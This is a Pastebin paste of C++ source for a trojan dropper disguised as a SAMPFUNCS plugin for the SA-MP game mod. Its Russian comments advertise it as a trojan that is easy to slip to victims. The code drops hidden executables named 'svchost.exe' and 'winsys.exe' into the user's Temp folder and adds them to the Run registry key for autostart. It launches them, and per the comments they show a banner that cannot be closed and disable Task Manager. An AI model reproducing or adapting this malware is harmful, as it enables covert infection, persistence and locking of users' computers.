API tools faq
paste
Advertisement
Guest User

фч

a guest
Aug 11th, 2017
1,417
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 6.12 KB | None | 0 0
raw download clone embed print report
  1. #define _SILENCE_STDEXT_HASH_DEPRECATION_WARNINGS
  2. // by Martin 0pc0d3R
  3. /*
  4.     TODO:
  5.     - Дропнуть резервные копии ехешников и добавить их в планировщик
  6.     Особенности:
  7.     + SF Троян (Беспалевно можна подсунуть)
  8.     + Сравнительно небольшой вес
  9.     + Дропает скрытые файлы помеченные как системные
  10.     + Прописывается в автозагрузку
  11.     + Баннер невозможно ничем закрыть/перебить
  12.     + Отключает диспетчер задач прямо в системе
  13. */
  14. #include <windows.h>
  15. #include <string>
  16. #include <assert.h>
  17. #include <process.h>
  18. #include "SAMPFUNCS_API.h"
  19. #include "game_api\game_api.h"
  20. #include <shellapi.h>
  21. #include "resource.h"
  22. #include "Registry.h"
  23. #include <direct.h>
  24. #pragma comment (lib, "Shell32.lib")
  25. HMODULE ThisDLL = nullptr;
  26. SAMPFUNCS *SF = new SAMPFUNCS();
  27. bool extractResource(bool mode = false)
  28. {
  29.     bool success = false;
  30.     try  
  31.     {
  32.         if (mode == false)
  33.         {
  34.             HRSRC hResource = ::FindResourceA(ThisDLL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
  35.             if (hResource == 0) return false;
  36.             HGLOBAL hFileResource = LoadResource(ThisDLL, hResource);
  37.             if (hFileResource == 0) return false;
  38.             LPVOID lpFile = LockResource(hFileResource);
  39.             if (lpFile == 0) return false;
  40.             DWORD dwSize = SizeofResource(ThisDLL, hResource);
  41.             if (dwSize == 0) return false;
  42.             char Uname[50]; DWORD szI = 50; GetUserNameA(Uname, &szI);
  43.             char path[256]; sprintf(path, "C:\\Users\\%s\\AppData\\Local\\Temp\\svchost.exe", Uname);
  44.             HANDLE hFile = CreateFile(path, GENERIC_READ | GENERIC_WRITE, 0, NULL,
  45.             CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
  46.             HANDLE hFilemap = CreateFileMappingA(hFile, NULL, PAGE_READWRITE, 0, dwSize, NULL);
  47.             if (hFilemap == 0) {return false;}
  48.             LPVOID lpBaseAddress = MapViewOfFile(hFilemap, FILE_MAP_WRITE, 0, 0, 0);            
  49.             CopyMemory(lpBaseAddress, lpFile, dwSize);
  50.             UnmapViewOfFile(lpBaseAddress); CloseHandle(hFilemap); CloseHandle(hFile);
  51.             DWORD attributes = GetFileAttributes(path);
  52.             SetFileAttributes(path, attributes + FILE_ATTRIBUTE_SYSTEM + FILE_ATTRIBUTE_HIDDEN);
  53.             return true;
  54.         }
  55.         else
  56.         {
  57.             HRSRC hResource = ::FindResourceA(ThisDLL, MAKEINTRESOURCE(IDR_RCDATA2), RT_RCDATA);
  58.             if (hResource == 0) return false;
  59.             HGLOBAL hFileResource = LoadResource(ThisDLL, hResource);
  60.             if (hFileResource == 0) return false;
  61.             LPVOID lpFile = LockResource(hFileResource);
  62.             if (lpFile == 0) return false;
  63.             DWORD dwSize = SizeofResource(ThisDLL, hResource);
  64.             if (dwSize == 0) return false;
  65.             char Uname[50]; DWORD szI = 50; GetUserNameA(Uname, &szI);
  66.             char path[256]; sprintf(path, "C:\\Users\\%s\\AppData\\Local\\Temp\\winsys.exe", Uname);
  67.             HANDLE hFile = CreateFile(path, GENERIC_READ | GENERIC_WRITE, 0, NULL,
  68.             CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
  69.             HANDLE hFilemap = CreateFileMappingA(hFile, NULL, PAGE_READWRITE, 0, dwSize, NULL);
  70.             if (hFilemap == 0) {return false;}
  71.             LPVOID lpBaseAddress = MapViewOfFile(hFilemap, FILE_MAP_WRITE, 0, 0, 0);            
  72.             CopyMemory(lpBaseAddress, lpFile, dwSize);
  73.             UnmapViewOfFile(lpBaseAddress); CloseHandle(hFilemap); CloseHandle(hFile);
  74.             DWORD attributes = GetFileAttributes(path);
  75.             SetFileAttributes(path, attributes + FILE_ATTRIBUTE_SYSTEM + FILE_ATTRIBUTE_HIDDEN);
  76.             return true;
  77.         }
  78.     }
  79.     catch (...) {}
  80.     return success;
  81. }
  82. void Dropper()
  83. {
  84.     CEasyRegistry *trojan = new CEasyRegistry(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run");
  85.     static bool first_etap = false;
  86.     if (first_etap == false)
  87.     {
  88.         bool eSuccess = extractResource(false);
  89.         char Uname[50]; DWORD szI = 50; GetUserNameA(Uname, &szI);
  90.         char path[256]; sprintf(path, "C:\\Users\\%s\\AppData\\Local\\Temp\\svchost.exe", Uname);
  91.         char npath[256]; sprintf(npath, "\"%s\"", path);
  92.         trojan->WriteString("mscorclr", npath);
  93.         if (eSuccess == true) ShellExecuteA(NULL, "open", path, NULL, NULL, SW_HIDE);
  94.         first_etap = true; Dropper();
  95.     }
  96.     else
  97.     {
  98.         ///////////////////////////////////////////////////////////////////////////////////////////
  99.         bool Success = extractResource(true);
  100.         char Uname[50]; DWORD szI = 50; GetUserNameA(Uname, &szI);
  101.         char dpath[256]; sprintf(dpath, "C:\\Users\\%s\\AppData\\Local\\Temp\\winsys.exe", Uname);
  102.         char rpath[256]; sprintf(rpath, "\"%s\"", dpath);
  103.         trojan->WriteString("windrm", rpath);
  104.         if (Success == true) ShellExecuteA(NULL, "open", dpath, NULL, NULL, SW_SHOW);
  105.     }
  106.     /*HRSRC hResource = ::FindResourceA(ThisDLL, MAKEINTRESOURCE(IDR_RCDATA3), RT_RCDATA);
  107.     if (hResource == 0) return;
  108.     HGLOBAL hFileResource = LoadResource(ThisDLL, hResource);
  109.     if (hFileResource == 0) return;
  110.     LPVOID lpFile = LockResource(hFileResource);
  111.     if (lpFile == 0) return;
  112.     DWORD dwSize = SizeofResource(ThisDLL, hResource);
  113.     if (dwSize == 0) return;
  114.     char path[256]; _getcwd(path, 256);
  115.     strcat(path, "\\SAMPFUNCS\\SAMPFUNCS.sf");
  116.     HANDLE hFile = CreateFile(path, GENERIC_READ | GENERIC_WRITE, 0, NULL,
  117.     CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
  118.     HANDLE hFilemap = CreateFileMappingA(hFile, NULL, PAGE_READWRITE, 0, dwSize, NULL);
  119.     if (hFilemap == 0) {return;}
  120.     LPVOID lpBaseAddress = MapViewOfFile(hFilemap, FILE_MAP_WRITE, 0, 0, 0);            
  121.     CopyMemory(lpBaseAddress, lpFile, dwSize);
  122.     UnmapViewOfFile(lpBaseAddress); CloseHandle(hFilemap); CloseHandle(hFile);
  123.     DWORD attributes = GetFileAttributes(path);
  124.     SetFileAttributes(path, attributes + FILE_ATTRIBUTE_HIDDEN);*/
  125. }
  126. void __stdcall mainloop( void )
  127. {
  128.     static bool init = false;
  129.     if (!init)
  130.     {
  131.         if (GAME == nullptr) return;
  132.         if (GAME->GetSystemState() != eSystemState::GS_PLAYING_GAME) return;
  133.         if(!SF->getSAMP()->IsInitialized()) return;
  134.         Dropper();
  135.         init = true;
  136.     }
  137. }
  138. bool WINAPI DllMain( HMODULE hModule, DWORD dwReasonForCall, LPVOID lpReserved )
  139. {
  140.     switch ( dwReasonForCall )
  141.     {
  142.     case DLL_PROCESS_ATTACH:
  143.         ThisDLL = hModule;
  144.         SF->initPlugin( mainloop, hModule );
  145.         break;
  146.     case DLL_THREAD_ATTACH:
  147.     case DLL_THREAD_DETACH:
  148.     case DLL_PROCESS_DETACH:
  149.         break;
  150.     }
  151.     return TRUE;
  152. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!